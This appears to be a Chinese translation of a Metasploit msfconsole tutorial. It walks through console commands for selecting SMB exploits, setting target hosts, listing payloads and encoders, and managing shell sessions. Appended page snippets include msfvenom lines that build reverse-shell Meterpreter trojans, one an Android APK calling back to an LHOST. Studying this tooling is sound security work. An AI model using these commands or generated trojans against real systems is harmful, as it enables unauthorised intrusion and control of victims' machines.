        connect       Communicate with a host
    ...snip...
    
    Database Backend Commands
    =========================
    
        Command           Description
        -------           -----------
        db_connect        Connect to an existing database
        db_disconnect     Disconnect from the current database instance
        db_export         Export a file containing the contents of the database
        db_import         Import a scan result file (filetype will be auto-detected)
    ...snip...
    

    info 命令

    info 命令将提供有关特定模块的详细信息,包括所有选项、目标和其他信息。在使用之前,请务必始终阅读模块说明,因为有些可能会产生不良效果。

    info 命令还提供以下信息:

    • 作者和许可信息
    • 漏洞引用(即:CVE、BID 等)
    • 模块可能具有的任何有效负载限制
    msf  exploit(ms09_050_smb2_negotiate_func_index) > info exploit/windows/smb/ms09_050_smb2_negotiate_func_index 
    
           Name: Microsoft SRV2.SYS SMB Negotiate ProcessID Function Table Dereference
         Module: exploit/windows/smb/ms09_050_smb2_negotiate_func_index
        Version: 14774
       Platform: Windows
     Privileged: Yes
        License: Metasploit Framework License (BSD)
           Rank: Good
    
    Provided by:
      Laurent Gaffie <laurent.gaffie@gmail.com>
      hdm <hdm@metasploit.com>
      sf <stephen_fewer@harmonysecurity.com>
    
    Available targets:
      Id  Name
      --  ----
      0   Windows Vista SP1/SP2 and Server 2008 (x86)
    
    Basic options:
      Name   Current Setting  Required  Description
      ----   ---------------  --------  -----------
      RHOST                   yes       The target address
      RPORT  445              yes       The target port
      WAIT   180              yes       The number of seconds to wait for the attack to complete.
    
    Payload information:
      Space: 1024
    
    Description:
      This module exploits an out of bounds function table dereference in 
      the SMB request validation code of the SRV2.SYS driver included with 
      Windows Vista, Windows 7 release candidates (not RTM), and Windows 
      2008 Server prior to R2. Windows Vista without SP1 does not seem 
      affected by this flaw.
    
    References:
      http://www.microsoft.com/technet/security/bulletin/MS09-050.mspx
      http://cve.mitre.org/cgi-bin/cvename.cgi?name=2009-3103
      http://www.securityfocus.com/bid/36299
      http://www.osvdb.org/57799
      http://seclists.org/fulldisclosure/2009/Sep/0039.html
      http://www.microsoft.com/technet/security/Bulletin/MS09-050.mspx
    
    msf  exploit(ms09_050_smb2_negotiate_func_index) >
    

    irb 命令

    运行 irb 命令会将您放入一个实时 Ruby 解释器 shell 中,您可以在其中发出命令并动态创建 Metasploit 脚本。此功能对于了解框架的内部结构也非常有用。

    msf > irb
    [*] Starting IRB shell...
    
    >> puts "Hello, metasploit!"
    Hello, metasploit!
    => nil
    >> Framework::Version
    => "4.8.2-2014022601"
    

    jobs 命令

    jobs是在后台运行的模块。jobs命令提供了列出和终止这些jobs的功能。

    msf > jobs -h
    Usage: jobs [options]
    
    Active job manipulation and interaction.
    
    OPTIONS:
    
        -K        Terminate all running jobs.
        -h        Help banner.
        -i   Lists detailed information about a running job.
        -k   Terminate the specified job name.
        -l        List all running jobs.
        -v        Print more detailed info.  Use with -i and -l
    
    msf >
    

    kill 命令

    当提供作业 ID 时,kill 命令将终止任何正在运行的作业。

    msf exploit(ms10_002_aurora) > kill 0
    Stopping job: 0...
    
    [*] Server stopped.
    

    load 命令

    load 命令从 Metasploit 的插件目录中加载一个插件。参数在 shell 上作为 key=val 传递。

    msf > load
    Usage: load  [var=val var=val ...]
    
    Loads a plugin from the supplied path.  If path is not absolute, first looks
    in the user's plugin directory (/root/.msf4/plugins) then
    in the framework root plugin directory (/usr/share/metasploit-framework/plugins).
    The optional var=val options are custom parameters that can be passed to plugins.
    
    msf > load pcap_log
    [*] PcapLog plugin loaded.
    [*] Successfully loaded plugin: pcap_log
    

    loadpath 命令

    loadpath 命令将为该路径加载一个由第三部分组成的模块树,以便您可以将 Metasploit 指向您的 0 day漏洞利用、编码器、有效负载等。

    msf > loadpath /home/secret/modules
    
    Loaded 0 modules.
    

    unload 命令

    相反,unload命令卸载以前加载的插件并删除所有扩展命令。

    msf > unload pcap_log
    Unloading plugin pcap_log...unloaded.
    

    resource 命令

    resource命令运行可通过 msfconsole 加载的资源(批处理)文件。

    msf > resource
    Usage: resource path1 [path2 ...]
    
    Run the commands stored in the supplied files.  Resource files may also contain
    ruby code between  tags.
    
    See also: makerc
    

    某些攻击(如 Karmetasploit)使用资源文件在 karma.rc 文件中运行一组命令来创建攻击。稍后,我们将讨论在Karmetasploit之外,这如何非常有用。

    msf > resource karma.rc
    [*] Processing karma.rc for ERB directives.
    resource (karma.rc_.txt)> db_connect postgres:toor@127.0.0.1/msfbook
    resource (karma.rc_.txt)> use auxiliary/server/browser_autopwn
    ...snip...
    

    批处理文件可以大大加快测试和开发时间,并允许用户自动执行许多任务。除了从 msfconsole 中加载批处理文件之外,还可以在启动时使用 -r 标志传递批处理文件。下面的简单示例创建一个批处理文件,以在启动时显示 Metasploit 版本号。

    root@kali:~# echo version > version.rc
    root@kali:~# msfconsole -r version.rc
    
     _                                                    _
    /     /         __                         _   __  /_/ __
    | |  / | _____               ___   _____ | | /   _    
    | | /| | | ___ |- -|   /    / __ | -__/ | || | || | |- -|
    |_|   | | | _|__  | |_  / - __    | |    | | __/| |  | |_
          |/  |____/  ___/ / \___/   /     __|    |_  ___
    
    Frustrated with proxy pivoting? Upgrade to layer-2 VPN pivoting with
    Metasploit Pro -- type 'go_pro' to launch it now.
    
           =[ metasploit v4.8.2-2014021901 [core:4.8 api:1.0] ]
    + -- --=[ 1265 exploits - 695 auxiliary - 202 post ]
    + -- --=[ 330 payloads - 32 encoders - 8 nops      ]
    
    [*] Processing version.rc for ERB directives.
    resource (version.rc)> version
    Framework: 4.8.2-2014022601
    Console  : 4.8.2-2014022601.15168
    msf >
    

    route 命令

    Metasploit中的route命令允许您通过会话或"通信"路由套接字,从而提供基本的透视功能。若要添加路由,请传递目标子网和网络掩码,后跟会话 (comm) 编号。

    meterpreter > route -h
    Route traffic destined to a given subnet through a supplied session.
    
    Usage:
      route [add/remove] subnet netmask [comm/sid]
      route [add/remove] cidr [comm/sid]
      route [get] 
      route [flush]
      route [print]
    
    Subcommands:
      add - make a new route
      remove - delete a route; 'del' is an alias
      flush - remove all routes
      get - display the route for a given target
      print - show all active routes
    
    Examples:
      Add a route for all hosts from 192.168.0.0 to 192.168.0.0 through session 1
        route add 192.168.0.0 255.255.255.0 1
        route add 192.168.0.0/24 1
    
      Delete the above route
        route remove 192.168.0.0/24 1
        route del 192.168.0.0 255.255.255.0 1
    
      Display the route that would be used for the given host or network
        route get 192.168.0.11
    
    meterpreter >
    
    meterpreter > route
    
    Network routes
    ==============
    
        Subnet           Netmask          Gateway
        ------           -------          -------
        0.0.0.0          0.0.0.0          172.16.1.254
        127.0.0.0        255.0.0.0        127.0.0.1
        172.16.1.0       255.255.255.0    172.16.1.100
        172.16.1.100     255.255.255.255  127.0.0.1
        172.16.255.255   255.255.255.255  172.16.1.100
        224.0.0.0        240.0.0.0        172.16.1.100
        255.255.255.255  255.255.255.255  172.16.1.100
    

    search 命令

    msfconsole 包括一个广泛的基于正则表达式的搜索功能。如果您对要查找的内容有大致了解,则可以通过search进行搜索。在下面的输出中,正在搜索 MS 公告 MS09-011。搜索函数将在模块名称、描述、引用等中找到此字符串。

    请注意,Metasploit 模块的命名约定使用下划线而不是连字符。

    msf > search usermap_script
    
    Matching Modules
    ================
    
       Name                                Disclosure Date  Rank       Description
       ----                                ---------------  ----       -----------
       exploit/multi/samba/usermap_script  2007-05-14       excellent  Samba "username map script" Command Execution
    
    msf >
    

    help 命令

    您可以使用内置的关键字系统进一步优化搜索。

    msf > help search
    Usage: search [keywords]
    
    Keywords:
      app       :  Modules that are client or server attacks
      author    :  Modules written by this author
      bid       :  Modules with a matching Bugtraq ID
      cve       :  Modules with a matching CVE ID
      edb       :  Modules with a matching Exploit-DB ID
      name      :  Modules with a matching descriptive name
      platform  :  Modules affecting this platform
      ref       :  Modules with a matching ref
      type      :  Modules of a specific type (exploit, auxiliary, or post)
    
    Examples:
      search cve:2009 type:exploit app:client
    
    msf >
    

    name 关键字

    若要使用描述性名称进行搜索,请使用 name 关键字。

    msf > search name:mysql
    
    Matching Modules
    ================
    
       Name                                               Disclosure Date  Rank       Description
       ----                                               ---------------  ----       -----------
       auxiliary/admin/mysql/mysql_enum                                    normal     MySQL Enumeration Module
       auxiliary/admin/mysql/mysql_sql                                     normal     MySQL SQL Generic Query
       auxiliary/analyze/jtr_mysql_fast                                    normal     John the Ripper MySQL Password Cracker (Fast Mode)
       auxiliary/scanner/mysql/mysql_authbypass_hashdump  2012-06-09       normal     MySQL Authentication Bypass Password Dump
       auxiliary/scanner/mysql/mysql_hashdump                              normal     MYSQL Password Hashdump
       auxiliary/scanner/mysql/mysql_login                                 normal     MySQL Login Utility
       auxiliary/scanner/mysql/mysql_schemadump                            normal     MYSQL Schema Dump
       auxiliary/scanner/mysql/mysql_version                               normal     MySQL Server Version Enumeration
       exploit/linux/mysql/mysql_yassl_getname            2010-01-25       good       MySQL yaSSL CertDecoder::GetName Buffer Overflow
       exploit/linux/mysql/mysql_yassl_hello              2008-01-04       good       MySQL yaSSL SSL Hello Message Buffer Overflow
       exploit/windows/mysql/mysql_payload                2009-01-16       excellent  Oracle MySQL for Microsoft Windows Payload Execution
       exploit/windows/mysql/mysql_yassl_hello            2008-01-04       average    MySQL yaSSL SSL Hello Message Buffer Overflow
    msf >
    

    platform 关键字

    您可以使用platform将搜索范围缩小到影响特定平台的模块。

    msf > search platform:aix
    
    Matching Modules
    ================
    
       Name                                  Disclosure Date  Rank    Description
       ----                                  ---------------  ----    -----------
       payload/aix/ppc/shell_bind_tcp                         normal  AIX Command Shell, Bind TCP Inline
       payload/aix/ppc/shell_find_port                        normal  AIX Command Shell, Find Port Inline
       payload/aix/ppc/shell_interact                         normal  AIX execve shell for inetd
    ...snip...
    

    type 关键字

    使用type可以按模块类型(如auxiliary<辅助模块>、post、exploit<漏洞利用模块>等)进行筛选。

    msf > search type:post
    
    Matching Modules
    ================
    
       Name                                                Disclosure Date  Rank    Description
       ----                                                ---------------  ----    -----------
       post/linux/gather/checkvm                                            normal  Linux Gather Virtual Environment Detection
       post/linux/gather/enum_cron                                          normal  Linux Cron Job Enumeration
       post/linux/gather/enum_linux                                         normal  Linux Gather System Information
    ...snip...
    

    author 关键字

    使用author关键字进行搜索可让您按自己喜欢的作者搜索模块。

    msf > search author:dookie
    
    Matching Modules
    ================
    
       Name                                                       Disclosure Date  Rank     Description
       ----                                                       ---------------  ----     -----------
       exploit/osx/http/evocam_webserver                          2010-06-01       average  MacOS X EvoCam HTTP GET Buffer Overflow
       exploit/osx/misc/ufo_ai                                    2009-10-28       average  UFO: Alien Invasion IRC Client Buffer Overflow Exploit
       exploit/windows/browser/amaya_bdo                          2009-01-28       normal   Amaya Browser v11.0 bdo tag overflow
    ...snip...
    

    多个关键字组合

    您还可以将多个关键字组合在一起,以进一步缩小返回结果的范围。

    msf > search cve:2011 author:jduck platform:linux
    
    Matching Modules
    ================
    
       Name                                         Disclosure Date  Rank     Description
       ----                                         ---------------  ----     -----------
       exploit/linux/misc/netsupport_manager_agent  2011-01-08       average  NetSupport Manager Agent Remote Buffer Overflow
    

    sessions 命令

    sessions命令允许您列出生成的会话、与之交互和终止生成的会话。这些会话可以是 shell、Meterpreter 会话、VNC 等。

    msf > sessions -h
    Usage: sessions [options] or sessions [id]
    
    Active session manipulation and interaction.
    
    OPTIONS:
    
        -C   Run a Meterpreter Command on the session given with -i, or all
        -K        Terminate all sessions
        -c   Run a command on the session given with -i, or all
        -h        Help banner
        -i   Interact with the supplied session ID
        -k   Terminate sessions by session ID and/or range
        -l        List all active sessions
        -q        Quiet mode
        -r        Reset the ring buffer for the session given with -i, or all
        -s   Run a script on the session given with -i, or all
        -t   Set a response timeout (default: 15)
        -u   Upgrade a shell to a meterpreter session on many platforms
        -v        List sessions in verbose mode
        -x        Show extended information in the session table
    
    Many options allow specifying session ranges using commas and dashes.
    For example:  sessions -s checkvm -i 1,3-5  or  sessions -k 1-2,5,6
    

    要列出任何活动会话,请将 -l 选项传递给sessions

    msf exploit(3proxy) > sessions -l
    
    Active sessions
    ===============
    
      Id  Description    Tunnel
      --  -----------    ------
      1   Command shell  192.168.1.101:33191 -> 192.168.1.104:4444
    

    要与给定会话交互,您只需使用 -i 开关,后跟会话的 ID 号。

    msf exploit(3proxy) > sessions -i 1
    [*] Starting interaction with 1...
    
    C:WINDOWSsystem32>
    

    set 命令

    set 命令允许您为正在使用的当前模块配置框架选项和参数。

    msf auxiliary(ms09_050_smb2_negotiate_func_index) > set RHOST 172.16.194.134
    RHOST => 172.16.194.134
    msf auxiliary(ms09_050_smb2_negotiate_func_index) > show options
    
    Module options (exploit/windows/smb/ms09_050_smb2_negotiate_func_index):
    
       Name   Current Setting  Required  Description
       ----   ---------------  --------  -----------
       RHOST  172.16.194.134   yes       The target address
       RPORT  445              yes       The target port
       WAIT   180              yes       The number of seconds to wait for the attack to complete.
    
    Exploit target:
    
       Id  Name
       --  ----
       0   Windows Vista SP1/SP2 and Server 2008 (x86)
    

    Metasploit还允许您设置在运行时使用的编码器。当您不太确定哪些有效负载编码方法适用于给定的漏洞利用时,这在漏洞利用开发中特别有用。

    msf  exploit(ms09_050_smb2_negotiate_func_index) > show encoders
    
    Compatible Encoders
    ===================
    
       Name                    Disclosure Date  Rank       Description
       ----                    ---------------  ----       -----------
       generic/none                             normal     The "none" Encoder
       x86/alpha_mixed                          low        Alpha2 Alphanumeric Mixedcase Encoder
       x86/alpha_upper                          low        Alpha2 Alphanumeric Uppercase Encoder
       x86/avoid_utf8_tolower                   manual     Avoid UTF8/tolower
       x86/call4_dword_xor                      normal     Call+4 Dword XOR Encoder
       x86/context_cpuid                        manual     CPUID-based Context Keyed Payload Encoder
       x86/context_stat                         manual     stat(2)-based Context Keyed Payload Encoder
       x86/context_time                         manual     time(2)-based Context Keyed Payload Encoder
       x86/countdown                            normal     Single-byte XOR Countdown Encoder
       x86/fnstenv_mov                          normal     Variable-length Fnstenv/mov Dword XOR Encoder
       x86/jmp_call_additive                    normal     Jump/Call XOR Additive Feedback Encoder
       x86/nonalpha                             low        Non-Alpha Encoder
       x86/nonupper                             low        Non-Upper Encoder
       x86/shikata_ga_nai                       excellent  Polymorphic XOR Additive Feedback Encoder
       x86/single_static_bit                    manual     Single Static Bit
       x86/unicode_mixed                        manual     Alpha2 Alphanumeric Unicode Mixedcase Encoder
       x86/unicode_upper                        manual     Alpha2 Alphanumeric Unicode Uppercase Encoder
    

    unset 命令

    当然,与 set 命令相反的是unsetunset 将删除以前使用 set 配置的参数。您可以使用unset all删除所有分配的变量。

    msf > set RHOSTS 192.168.1.0/24
    RHOSTS => 192.168.1.0/24
    msf > set THREADS 50
    THREADS => 50
    msf > set
    
    Global
    ======
    
      Name     Value
      ----     -----
      RHOSTS   192.168.1.0/24
      THREADS  50
    
    msf > unset THREADS
    Unsetting THREADS...
    msf > unset all
    Flushing datastore...
    msf > set
    
    Global
    ======
    
    No entries in data store.
    
    msf >
    

    setg 命令

    为了在渗透测试期间节省大量键入,可以在 msfconsole 中设置全局变量。您可以使用 setg 命令执行此操作。设置完这些内容后,您可以根据需要在任意数量的exploits和auxiliary模块中使用它们。您还可以保存它们,以便在下次启动 msfconsole 时使用。但是,问题是忘记了您已经保存了全局变量,因此在运行利用之前,请始终检查您的选项。相反,可以使用 unsetg 命令取消设置全局变量。在下面的示例中,变量以全大写字母输入(即:LHOST),但Metasploit不区分大小写,因此没有必要这样做。

    msf > setg LHOST 192.168.1.101
    LHOST => 192.168.1.101
    msf > setg RHOSTS 192.168.1.0/24
    RHOSTS => 192.168.1.0/24
    msf > setg RHOST 192.168.1.136
    RHOST => 192.168.1.136
    

    设置不同的变量后,可以运行 save 命令来保存当前环境和设置。保存设置后,它们将在启动时自动加载,这使您不必再次设置所有内容。

    msf > save
    Saved configuration to: /root/.msf4/config
    msf >
    

    show 命令

    在 msfconsole 提示符处输入 show 将显示 Metasploit 中的每个模块。

    msf > show
    
    Encoders
    ========
    
       Name                    Disclosure Date  Rank       Description
       ----                    ---------------  ----       -----------
       cmd/generic_sh                           good       Generic Shell Variable Substitution Command Encoder
       cmd/ifs                                  low        Generic ${IFS} Substitution Command Encoder
       cmd/printf_php_mq                        manual     printf(1) via PHP magic_quotes Utility Command Encoder
    ...snip...
    

    您可以使用许多 show 命令,但最常用的命令是 show auxiliaryshow exploitsshow payloadsshow encodersshow nops

    auxiliary 模块

    执行show auxiliary模块将显示 Metasploit 中所有可用辅助模块的列表。如前所述,辅助模块包括scanners扫描仪、denial of service modules拒绝服务模块、fuzzers模糊测试器等。

    msf > show auxiliary
    Auxiliary
    =========
    
       Name                                                  Disclosure Date  Rank    Description
       ----                                                  ---------------  ----    -----------
       admin/2wire/xslt_password_reset                       2007-08-15       normal  2Wire Cross-Site Request Forgery Password Reset Vulnerability
       admin/backupexec/dump                                                  normal  Veritas Backup Exec Windows Remote File Access
       admin/backupexec/registry                                              normal  Veritas Backup Exec Server Registry Access
    ...snip...
    
    exploits 模块

    当然,show exploits将是您最感兴趣的命令,因为从本质上讲,Metasploit都是关于利用的。运行 show exploits 以获取框架中包含的所有漏洞利用的列表。

    msf > show exploits
    
    Exploits
    ========
    
       Name                                                           Disclosure Date  Rank       Description
       ----                                                           ---------------  ----       -----------
       aix/rpc_cmsd_opcode21                                          2009-10-07       great      AIX Calendar Manager Service Daemon (rpc.cmsd) Opcode 21 Buffer Overflow
       aix/rpc_ttdbserverd_realpath                                   2009-06-17       great      ToolTalk rpc.ttdbserverd _tt_internal_realpath Buffer Overflow (AIX)
       bsdi/softcart/mercantec_softcart                               2004-08-19       great      Mercantec SoftCart CGI Overflow
    ...snip...
    
    使用 MSFconsole Payloads

    正在运行的show payloads将显示 Metasploit 中所有可用平台的所有不同有效负载。

    msf > show payloads
    
    Payloads
    ========
    
       Name                                             Disclosure Date  Rank    Description
       ----                                             ---------------  ----    -----------
       aix/ppc/shell_bind_tcp                                            normal  AIX Command Shell, Bind TCP Inline
       aix/ppc/shell_find_port                                           normal  AIX Command Shell, Find Port Inline
       aix/ppc/shell_interact                                            normal  AIX execve shell for inetd
    ...snip...
    
    payloads 模块

    如您所见,有很多有效负载可用。幸运的是,当您处于特定漏洞的上下文中时,运行 show payloads将仅显示与该特定漏洞兼容的有效负载。例如,如果这是Windows漏洞,则不会向您显示Linux有效负载。

    msf  exploit(ms08_067_netapi) > show payloads
    
    Compatible Payloads
    ===================
    
       Name                                             Disclosure Date  Rank    Description
       ----                                             ---------------  ----    -----------
       generic/custom                                                    normal  Custom Payload
       generic/debug_trap                                                normal  Generic x86 Debug Trap
       generic/shell_bind_tcp                                            normal  Generic Command Shell, Bind TCP Inline
    ...snip...
    
    options

    如果选择了特定模块,则可以发出 show options 命令以显示该特定模块可用和/或需要的设置。

    msf exploit(ms08_067_netapi) > show options
    
    Module options:
    
       Name     Current Setting  Required  Description
       ----     ---------------  --------  -----------
       RHOST                     yes       The target address
       RPORT    445              yes       Set the SMB service port
       SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)
    
    Exploit target:
    
       Id  Name
       --  ----
       0   Automatic Targeting
    
    targets

    如果您不确定操作系统是否容易受到特定攻击,请从exploits模块的上下文中运行 show targets 命令,以查看支持哪些目标。

    msf  exploit(ms08_067_netapi) > show targets
    
    Exploit targets:
    
       Id  Name
       --  ----
       0   Automatic Targeting
       1   Windows 2000 Universal
       10  Windows 2003 SP1 Japanese (NO NX)
       11  Windows 2003 SP2 English (NO NX)
       12  Windows 2003 SP2 English (NX)
    ...snip...
    
    advanced

    如果您希望进一步微调漏洞,可以通过运行 show advanced 来查看更高级选项

    msf exploit(ms08_067_netapi) > show advanced
    
    Module advanced options:
    
       Name           : CHOST
       Current Setting:
       Description    : The local client address
    
       Name           : CPORT
       Current Setting:
       Description    : The local client port
    
    ...snip...
    
    encoders

    正在运行的 show encoders将显示 MSF 中可用的编码器的列表。

    msf > show encoders
    Compatible Encoders
    ===================
    
       Name                    Disclosure Date  Rank       Description
       ----                    ---------------  ----       -----------
       cmd/generic_sh                           good       Generic Shell Variable Substitution Command Encoder
       cmd/ifs                                  low        Generic ${IFS} Substitution Command Encoder
       cmd/printf_php_mq                        manual     printf(1) via PHP magic_quotes Utility Command Encoder
       generic/none                             normal     The "none" Encoder
       mipsbe/longxor                           normal     XOR Encoder
       mipsle/longxor                           normal     XOR Encoder
       php/base64                               great      PHP Base64 encoder
       ppc/longxor                              normal     PPC LongXOR Encoder
       ppc/longxor_tag                          normal     PPC LongXOR Encoder
       sparc/longxor_tag                        normal     SPARC DWORD XOR Encoder
       x64/xor                                  normal     XOR Encoder
       x86/alpha_mixed                          low        Alpha2 Alphanumeric Mixedcase Encoder
       x86/alpha_upper                          low        Alpha2 Alphanumeric Uppercase Encoder
       x86/avoid_utf8_tolower                   manual     Avoid UTF8/tolower
       x86/call4_dword_xor                      normal     Call+4 Dword XOR Encoder
       x86/context_cpuid                        manual     CPUID-based Context Keyed Payload Encoder
       x86/context_stat                         manual     stat(2)-based Context Keyed Payload Encoder
       x86/context_time                         manual     time(2)-based Context Keyed Payload Encoder
       x86/countdown                            normal     Single-byte XOR Countdown Encoder
       x86/fnstenv_mov                          normal     Variable-length Fnstenv/mov Dword XOR Encoder
       x86/jmp_call_additive                    normal     Jump/Call XOR Additive Feedback Encoder
       x86/nonalpha                             low        Non-Alpha Encoder
       x86/nonupper                             low        Non-Upper Encoder
       x86/shikata_ga_nai                       excellent  Polymorphic XOR Additive Feedback Encoder
       x86/single_static_bit                    manual     Single Static Bit
       x86/unicode_mixed                        manual     Alpha2 Alphanumeric Unicode Mixedcase Encoder
       x86/unicode_upper                        manual     Alpha2 Alphanumeric Unicode Uppercase Encoder
    
    nops

    最后,发出 show nops 命令将显示 Metasploit 必须提供的 NOP 生成器。

    msf > show nops
    NOP Generators
    ==============
    
       Name             Disclosure Date  Rank    Description
       ----             ---------------  ----    -----------
       armle/simple                      normal  Simple
       mipsbe/better                     normal  Better
       php/generic                       normal  PHP Nop Generator
       ppc/simple                        normal  Simple
       sparc/random                      normal  SPARC NOP Generator
       tty/generic                       normal  TTY Nop Generator
       x64/simple                        normal  Simple
       x86/opty2                         normal  Opty2
       x86/single_byte                   normal  Single Byte
    

    use 命令

    当您决定使用特定模块时,发出 use 命令以选择它。use 命令会将您的上下文更改为特定模块,从而公开特定于类型的命令。请注意,在下面的输出中,之前设置的任何全局变量都已配置。

    msf > use dos/windows/smb/ms09_001_write
    msf auxiliary(ms09_001_write) > show options
    
    Module options:
    
       Name   Current Setting  Required  Description
       ----   ---------------  --------  -----------
       RHOST                   yes       The target address
       RPORT  445              yes       Set the SMB service port
    
    msf auxiliary(ms09_001_write) >
    

    在需要帮助的任何时候,都可以使用 msfconsole help命令来显示可用选项。

    展开全文
  • 目录1 msfconsole 介绍 1 msfconsole 介绍 msfconsole 简称 msf 是一款常用的安全测试工具,包含了常见的漏洞利用模块和生成各种木马,其提供了一个一体化的集中控制台,通过msfconsole,你可以访问和使用所有的...
  • Ubuntu 安装msfconsole

    千次阅读 2021-11-25 19:52:48
    Ubuntu 安装msfconsole 1.进入到opt目录下 cd /opt/ 2.下载安装文件 msfupdate.erb sudo wget ...
  • msfconsole的简单使用

    千次阅读 2020-12-30 11:00:23
    文章目录前言一、入侵步骤二、msfconsole常用命令总结 前言 Metasploit Framework 是非常优秀的开源渗透测试框架。 Metasploit 渗透测试框架(MSF3.4)包含3功能模块:msfconsole、msfweb、msfupdate。msfupdate...
  • Msfconsole工具概括: Msfconsole简称(msf)是一款常用的渗透测试工具,包含了常见的漏洞利用模块和生成各种木马,方便于安全测试人员的使用. (1)进行端口扫描. (2)进行服务的扫描.(3)扫描3306(Mysql)端口...
  • MSFCONSOLE COMMANDS

    2020-04-22 14:12:49
    MSFCONSOLE CORE COMMANDS TUTORIAL The MSFconsole has many different command options to choose from. The following are a core set of Metasploit commands with reference to their output. back ...
  • metasploit msfconsole 命令

    千次阅读 2018-09-24 09:56:15
    metasploit msfconsole 命令 metasploit msfconsole 命令 复制代码 msf &gt; help db_autopwn Commands =================== Command Description ------- ----------- db_autopwn Automaticall...
  • msfconsole 控制台简介

    2020-09-04 18:23:05
    Msfconsole提供了一个一体化的集中控制台。通过msfconsole,你可以访问和使用所有的metasploit的插件,payload,利用模块,post模块等等。Msfconsole还有第三方程序的接口,比如nmap,sqlmap等,可以直接在...
  • msfconsole捆绑木马

    2022-04-15 19:38:49
    捆绑木马 这里使用的是Kalilinux虚拟机 攻击机ip是192.168.0.108 靶机ip是192.168.177.134 生成木马文件 首先上传一个正常的安装包到kali里面 我这里下了一个QQ ...msfvenom -p windows/meterpreter/reverse_tcp ...
  • 渗透工具 msfconsole命令大全
  • 避坑笔记之Ubuntu 20.04 安装 msfconsole 有些人vps用网上传播最多的下面两条命令会报错 sudo wget ...
  • 首先去官网最底部下载deb文件,任意选一个 将该文件上传至ubuntu服务器上,然后输入以下命令: sudo dpkg -i [FILE_NAME] 根据提示耐心等待安装即可!
  • msfconsole基础命令

    2020-12-18 11:27:16
    生成反弹木马命令 msfvenom -p android/meterpreter/reverse_tcp lhost=192.168.43.146 lport=55555 R > /home/111.apk 生成一个木马程序111.exe,没有添加任何免杀,很容易被安全软件检测出,这里先介绍一下...
  • ssh自用dict,msfconsole

    2022-03-02 11:19:01
    ssh自用dict,msfconsole
  • msfconsole靶机攻破实战,简称msf是一款常用的渗透测试工具,包含了常见的漏洞利用模块和生成各种渗透文件,利用网站,手机等的漏洞将到目标靶机,操控目标靶机…这边仅供学习使用msfconsole注:默认kali 预装了...
  • centos安装msfconsole

    千次阅读 2021-02-25 17:39:54
    centos安装msfconsole curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall chmod 755 msfinstall ./...
  • KALI 2022.2 msfconsole 无法启动

    千次阅读 2022-07-20 12:05:50
    报错 从官网安装 Kali Linux 更新并重新启动后msfconsole 报错 sudo apt update && sudo apt dist-upgrade -y 错误信息: /usr/share/metasploit-framework/vendor/bundle/ruby/3.0.0/gems/hrr_rb_ssh-0.4.2/lib/hrr...
  • 一、msfconsole简介 msfconsole是msf的命令行交互界面。在msfconsole中,可以实现对msf的完美操作,是一个msf的一体化操作接口,可以完全地利用msf中的各种功能,使用msfconsole特定的命令进行操作,个人认为,相...
  • metasploit msfconsole 命令参数

    万次阅读 多人点赞 2018-09-30 21:38:21
    在MSF里面msfconsole可以说是最流行的一个接口程序。很多人一开始碰到msfconsole的时候就害怕了。那么多复杂的命令语句需要学习,但是msfconsole真的是一个强大的接口程序。Msfconsole提供了一个一体化的集中控制台...
  • Msfconsole使用总结

    2021-04-24 17:37:08
    MSFVENOM常规选项1.–p (- -payload-options)添加载荷payload。载荷这个东西比较多,这个软件就是根据对应的载荷payload生成对应平台下的后门,所以只有选对payload,再填写正确自己的IP,PORT就可以生成对应语言,...
  • msfconsole讲解.pptx

    2019-09-27 15:07:03
    MSF全称msfconsoleMsfconsole提供了一个一体化的集中控制台。通过msfconsole,你可以访问和使用所有的metasploit的插件,payload,利用模块,post模块等等。 MSF有免费和收费两种版本,收费版本具有免杀功能。
  • Msfconsole的基本使用

    千次阅读 2020-09-13 21:50:39
    msfconsole search 查找模块 use 装载模块 winxp ip :192.168.186.133 set RHOST 设置目标主机 run 执行攻击 目标蓝屏死机 重启 常用命令 show exploits 列出metasploit框架中的所有渗透攻击模块 ...
  • Msfconsole爆破ssh

    千次阅读 2020-06-24 02:21:07
    Msfconsole爆破ssh 一:什么是ssh Ssh为linux系统下的远程登录命令。好比windows下的远程桌面。登录ssh后可以对服务器进行相关的操作! 二:端口扫描 目标发现 1:用namp 或者netcat扫描网络,发现我的路由器是开启...
  • 1、直接使用msfconsole中自带的 “ms17_010_eternalblue”模块攻击机:192.168.148.134 kali linux2017.2 x64靶机:192.168.148.137 win7 x321.1先用msfconsole的smb模块扫描,看看是否有漏洞use auxiliary/scanner/...

空空如也

空空如也

1 2 3 4 5 ... 20
收藏数 7,592
精华内容 3,036
关键字:

msfconsole

友情链接: HC_BLE助手.zip